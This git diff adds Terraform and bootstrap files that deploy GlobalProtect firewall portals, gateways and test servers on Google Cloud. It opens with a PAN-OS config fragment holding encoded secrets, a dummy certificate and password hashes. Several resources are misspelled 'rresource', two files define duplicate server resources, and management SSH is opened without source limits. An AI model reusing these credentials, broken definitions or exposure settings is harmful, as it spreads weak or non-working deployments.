-AQ==/DO+X7/5/0zLt2M6gBYgg8Ayu4g=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 + + + a0cb01b7 + e8d8421e + Mar 25 14:05:09 2020 GMT + /CN=GP-CA + Mar 25 14:05:09 2021 GMT + dummy-gw-cert + 1616681109 + no + /CN=dummy-gw-cert + -----BEGIN CERTIFICATE----- +MIIDEzCCAfugAwIBAgIEa51q3DANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH +UC1DQTAeFw0yMDAzMjUxNDA1MDlaFw0yMTAzMjUxNDA1MDlaMBgxFjAUBgNVBAMT +DWR1bW15LWd3LWNlcnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7 +5By6OdRX2G2leyF+aVtOXZGKlCR0RUPPQckzIxTOs8duBwPJmXPGLpeh13tVJtEv +09bOpjHGOqJFfm/CO0R0NIxyMF4IurTIbw7eGGP/jg/SMXVi/XNTy2TRGteVJUch +jzxPpZiIxJmo5fzI7aKcxUXobuO+495u6tsHxYevmpg28RacK74GMqoGTC8+E1d2 +fXd0qMQyseuJsU6zEWOqwjEsC0Gqhwbq4byhdQbJW2juaSD1piv89Ed75MH7btUR +DJKHRnhNMcvpDnoH3IlQynRtLHUQjxlXUBRWlrCCjUOd0a/XWNgjT69iDa6K0V4s +WkH9QIaOGotafVZShYU/AgMBAAGjbTBrMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgO4 +MCcGA1UdJQQgMB4GCCsGAQUFBwMBBggrBgEFBQcDAgYIKwYBBQUHAwUwCQYDVR0j +BAIwADAdBgNVHQ4EFgQUzD9VvicyV2Bx4njYSjUHMYPqGe4wDQYJKoZIhvcNAQEL +BQADggEBAAwXTc9lMGZurI7j7BmxF5vNdRf86rwSJK70S/WMm7BHfFo4eRdqoa+J +Q90nm89osWMT3aXKriZ+ge7iq5jtu5r4vOPKelEbEa6vuXg2eaHpL23HBUxeTkNI +DxfYhMogoKFoiX9/zRBy+8lWz4b2IquAcjWFA4GWPfX+JtAUDpwAQFyIBxU0x4wy +hy8kLsAh+tuZfWgTFrYBS0tiV62Amtcl3/+G/zyoQ2orKtTHPBTaHOG3d3zLsQJ3 +c+PZn6KlSWAf2VthbbPnn1hvMxU+c7w2lWQX64FSzLt4LQSol7qnyLROgFKTKVXG +EB826Ks5mv+qxogo1C6hLvdpiHUp+ys= +-----END CERTIFICATE----- + + RSA + -AQ==B+uxEDleVDIXpf2wVEueVGEMvc4=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 + + + + + + tls1-0 + max + + dummy-portal-cert + + + + + + + + + all + + + + + + + $1$kobgpbqd$tCeUrtyaJNKirLxMwLs/o1 + + + $1$xgwfehpw$rdQRIHTfNVtUZIdeunXHG1 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + traffic + All Logs + yes + + + threat + All Logs + yes + + + wildfire + All Logs + yes + + + url + All Logs + yes + + + data + All Logs + yes + + + tunnel + All Logs + yes + + + auth + All Logs + yes + + + + + + +
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt new file mode 100644 index 00000000..3606b11c --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt @@ -0,0 +1,14 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt @@ -0,0 +1 @@ + diff --git a/gcp/GP-NoAutoScaling/gateways.tf b/gcp/GP-NoAutoScaling/gateways.tf new file mode 100644 index 00000000..eb72ede5 --- /dev/null +++ b/gcp/GP-NoAutoScaling/gateways.tf @@ -0,0 +1,121 @@ +resource "google_compute_address" "gp_gateway1_management" { + name = "gp-gateway1-management" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_address" "gp_gateway1_untrust" { + name = "gp-gateway1-untrust" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_instance" "gateway1" { + project = google_project.globalprotect.number + name = "gp-gateway1" + machine_type = var.FW_Machine_Type + zone = data.google_compute_zones.available.names[0] + can_ip_forward = true + allow_stopping_for_update = true + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = google_compute_subnetwork.untrust_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway1_untrust.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway1_management.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + } + + boot_disk { + initialize_params { + image = "${var.FW_Image}-${var.FW_PanOS}" + type = "pd-ssd" + } + } +} + +resource "google_compute_address" "gp_gateway2_management" { + name = "gp-gateway2-management" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_address" "gp_gateway2_untrust" { + name = "gp-gateway2-untrust" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_instance" "gateway2" { + project = google_project.globalprotect.number + name = "gp-gateway2" + machine_type = var.FW_Machine_Type + zone = data.google_compute_zones.available.names[1] + can_ip_forward = true + allow_stopping_for_update = true + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = google_compute_subnetwork.untrust_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway2_untrust.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_gateway2_management.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + } + + boot_disk { + initialize_params { + image = "${var.FW_Image}-${var.FW_PanOS}" + type = "pd-ssd" + } + } +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/gcp_firewall.tf b/gcp/GP-NoAutoScaling/gcp_firewall.tf new file mode 100644 index 00000000..afa4bc13 --- /dev/null +++ b/gcp/GP-NoAutoScaling/gcp_firewall.tf @@ -0,0 +1,33 @@ +resource "google_compute_firewall" "management" { + name = "management-firewall" + project = google_project.globalprotect.number + network = google_compute_network.management_network.name + allow { + protocol = "tcp" + ports = ["22", "443"] + } +} +resource "google_compute_firewall" "untrust" { + name = "untrust-firewall" + project = google_project.globalprotect.number + network = google_compute_network.untrust_network.name + allow { + protocol = "tcp" + ports = ["443"] + } + allow { + protocol = "udp" + ports = ["500","4500","4501"] + } + allow { + protocol = "esp" + } +} +resource "google_compute_firewall" "trust" { + name = "trust-firewall" + project = google_project.globalprotect.number + network = google_compute_network.trust_network.name + allow { + protocol = "all" + } +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/images/GP_in_GCP.png b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png new file mode 100644 index 00000000..989ebab3 Binary files /dev/null and b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png differ diff --git a/gcp/GP-NoAutoScaling/main.tf b/gcp/GP-NoAutoScaling/main.tf new file mode 100644 index 00000000..c6940ef9 --- /dev/null +++ b/gcp/GP-NoAutoScaling/main.tf @@ -0,0 +1,3 @@ +provider "google" {} + +provider "random" {} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/output.tf b/gcp/GP-NoAutoScaling/output.tf new file mode 100644 index 00000000..754d45d4 --- /dev/null +++ b/gcp/GP-NoAutoScaling/output.tf @@ -0,0 +1,11 @@ +output "Portal-Management-IP" { + value = "${google_compute_instance.portal.network_interface.1.access_config.0.nat_ip}" +} + +output "Gateway1-Management-IP" { + value = "${google_compute_instance.gateway1.network_interface.1.access_config.0.nat_ip}" +} + +output "Gateway2-Management-IP" { + value = "${google_compute_instance.gateway2.network_interface.1.access_config.0.nat_ip}" +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/portal.tf b/gcp/GP-NoAutoScaling/portal.tf new file mode 100644 index 00000000..dfed3411 --- /dev/null +++ b/gcp/GP-NoAutoScaling/portal.tf @@ -0,0 +1,56 @@ +resource "google_compute_address" "gp_portal_management" { + name = "gp-portal-management" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_address" "gp_portal_untrust" { + name = "gp-portal-untrust" + project = google_project.globalprotect.number + region = var.GCP_Region +} + +resource "google_compute_instance" "portal" { + project = google_project.globalprotect.number + name = "gp-portal" + machine_type = var.FW_Machine_Type + zone = data.google_compute_zones.available.names[0] + can_ip_forward = false + allow_stopping_for_update = true + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + network_interface { + subnetwork = google_compute_subnetwork.untrust_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_portal_untrust.address + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config { + nat_ip = google_compute_address.gp_portal_management.address + } + } + + boot_disk { + initialize_params { + image = "${var.FW_Image}-${var.FW_PanOS}" + type = "pd-ssd" + } + } +} diff --git a/gcp/GP-NoAutoScaling/project.tf b/gcp/GP-NoAutoScaling/project.tf new file mode 100644 index 00000000..e44a7ff4 --- /dev/null +++ b/gcp/GP-NoAutoScaling/project.tf @@ -0,0 +1,19 @@ +resource "random_id" "random_number" { + byte_length = 2 +} +resource "google_project" "globalprotect" { + name = "${var.Base_Project_Name}-${random_id.random_number.hex}" + project_id = "${var.Base_Project_Name}-${random_id.random_number.hex}" + billing_account = var.Billing_Account + auto_create_network = false +} +resource "google_project_service" "globalprotect" { + project = google_project.globalprotect.number + service = "storage-api.googleapis.com" + disable_dependent_services = true +} + +data "google_compute_zones" "available" { + project = google_project.globalprotect.project_id + region = var.GCP_Region +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/servers.tf b/gcp/GP-NoAutoScaling/servers.tf new file mode 100644 index 00000000..f503ff40 --- /dev/null +++ b/gcp/GP-NoAutoScaling/servers.tf @@ -0,0 +1,77 @@ +resource "google_compute_instance" "server1" { + name = "server1" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[0] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config {} + } +} + +rresource "google_compute_instance" "server2" { + name = "server2" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[1] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.management_subnet.self_link + access_config {} + } +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/terraform.tfvars b/gcp/GP-NoAutoScaling/terraform.tfvars new file mode 100644 index 00000000..780ca566 --- /dev/null +++ b/gcp/GP-NoAutoScaling/terraform.tfvars @@ -0,0 +1,22 @@ +Billing_Account = "" + +Base_Project_Name = "" + +Public_Key_Path = "~/.ssh/id_rsa.pub" + +GCP_Region = "" + +#FW_PanOS = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL +FW_PanOS = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1 +#FW_PanOS = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2 + +FW_Image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" + + +Management_Subnet_CIDR = "10.0.0.0/24" + +Untrust_Subnet_CIDR = "10.0.1.0/24" + +Trust_Subnet_CIDR = "10.0.2.0/24" + +FW_Machine_Type = "n1-standard-4" \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/variables.tf b/gcp/GP-NoAutoScaling/variables.tf new file mode 100644 index 00000000..fb7a8311 --- /dev/null +++ b/gcp/GP-NoAutoScaling/variables.tf @@ -0,0 +1,10 @@ +variable Billing_Account {} +variable Base_Project_Name {} +variable Public_Key_Path {} +variable GCP_Region {} +variable Management_Subnet_CIDR {} +variable Untrust_Subnet_CIDR {} +variable Trust_Subnet_CIDR {} +variable FW_Machine_Type {} +variable FW_PanOS {} +variable FW_Image {} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/vpc-subnets.tf b/gcp/GP-NoAutoScaling/vpc-subnets.tf new file mode 100644 index 00000000..5373f55c --- /dev/null +++ b/gcp/GP-NoAutoScaling/vpc-subnets.tf @@ -0,0 +1,36 @@ +resource "google_compute_network" "management_network" { + project = google_project.globalprotect.number + name = "management" + auto_create_subnetworks = false +} +resource "google_compute_network" "untrust_network" { + project = google_project.globalprotect.number + name = "untrust" + auto_create_subnetworks = false +} +resource "google_compute_network" "trust_network" { + project = google_project.globalprotect.number + name = "trust" + auto_create_subnetworks = false +} +resource "google_compute_subnetwork" "management_subnet" { + name = "management" + project = google_project.globalprotect.number + region = var.GCP_Region + ip_cidr_range = var.Management_Subnet_CIDR + network = google_compute_network.management_network.self_link +} +resource "google_compute_subnetwork" "untrust_subnet" { + name = "untrust" + project = google_project.globalprotect.number + region = var.GCP_Region + ip_cidr_range = var.Untrust_Subnet_CIDR + network = google_compute_network.untrust_network.self_link +} +resource "google_compute_subnetwork" "trust_subnet" { + name = "trust" + project = google_project.globalprotect.number + region = var.GCP_Region + ip_cidr_range = var.Trust_Subnet_CIDR + network = google_compute_network.trust_network.self_link +} \ No newline at end of file diff --git a/gcp/GP-NoAutoScaling/webservers.tf b/gcp/GP-NoAutoScaling/webservers.tf new file mode 100644 index 00000000..cbf1c424 --- /dev/null +++ b/gcp/GP-NoAutoScaling/webservers.tf @@ -0,0 +1,75 @@ +resource "google_compute_instance" "server1" { + name = "server1" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[0] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1804-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + access_config {} + } +} + +rresource "google_compute_instance" "server2" { + name = "server2" + project = google_project.globalprotect.number + zone = data.google_compute_zones.available.names[1] + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + + metadata = { + serial-port-enable = true + ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : "" + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1804-lts" + } + } + + network_interface { + subnetwork = google_compute_subnetwork.trust_subnet.self_link + access_config {} + } +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml new file mode 100644 index 00000000..ae3c0a1b --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml @@ -0,0 +1,88 @@ +name: gcp_jenkins_exp +# label used for menu selection +label: GCP Jenkins Security Framework Step 1 Infrastructure Deployment Build + +description: > + This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment. The template deploy the Following: + GCP Projects, VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups. + The Template will also deploy Palo Alto Networks Firewall with security posture. +# type of skillet (panos or panorama or template or terraform) +type: python3 + +# more complex skillets may express a dependency on another skillet that should be loaded before this one. +# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration +# As this skillet is very simple, there is no need to build on another one. +extends: + +# Labels allow grouping and type specific options and are generally only used in advanced cases +labels: + collection: GCP Jenkins Security Framework + +# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc +# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application +variables: + - name: username + description: FW Username + default: admin + type_hint: text + - name: password + description: FW Password + default: + type_hint: password + - name: GCP_Region + description: GCP Region + default: us-central1 + type_hint: dropdown + dd_list: + - key: "US-Central-1 (Iowa)" + value: "us-central1" + - key: "US-East-1 (South Carolina)" + value: "us-east1" + - key: "US-East-4 (Virginia)" + value: "us-east4" + - key: "US-West-1 (Oregon)" + value: "us-west1" + - key: "US-West-2 (California)" + value: "us-west2" + - key: "Europe-North-1 (Finland)" + value: "europe-north1" + - key: "Europe-West-1 (Belgium)" + value: "europe-west1" + - key: "Europe-West-2 (UK)" + value: "europe-west2" + - key: "Europe-West-3 (Germany)" + value: "europe-west3" + - key: "Europe-West-4 (Netherlands)" + value: "europe-west4" + - key: "Europe-West-6 (Switzerland)" + value: "europe-west6" + - key: "North-America-Northeast-1 (Canada)" + value: "northamerica-northeast1" + - key: "South-America-East-1 (Brazil)" + value: "southamerica-east1" + - key: "Asia-East-1 (Taiwan)" + value: "asia-east1" + - key: "Asia-East-2 (Hong Kong)" + value: "asia-east2" + - key: "Asia-Northeast-1 (Tokyo)" + value: "asia-northeast1" + - key: "Asia-Northeast-2 (Osaka)" + value: "asia-northeast2" + - key: "Asia-South-1 (India)" + value: "asia-south1" + - key: "Asia-Southeast-1 (Singapore)" + value: "asia-southeast1" + - key: "Australia-Southeast-1 (Australia)" + value: "australia-southeast1" + - name: Billing_Account + description: GCP Billing Account + default: + type_hint: text + +# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath +# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file +# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined +# in the 'variables' section. +snippets: + - name: script + file: ../../deploy.py diff --git a/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml new file mode 100644 index 00000000..dcd0ad24 --- /dev/null +++ b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml @@ -0,0 +1,41 @@ +name: gcp_jenkins_exp_teardown +# label used for menu selection +label: GCP Jenkins Security Framework Step 4 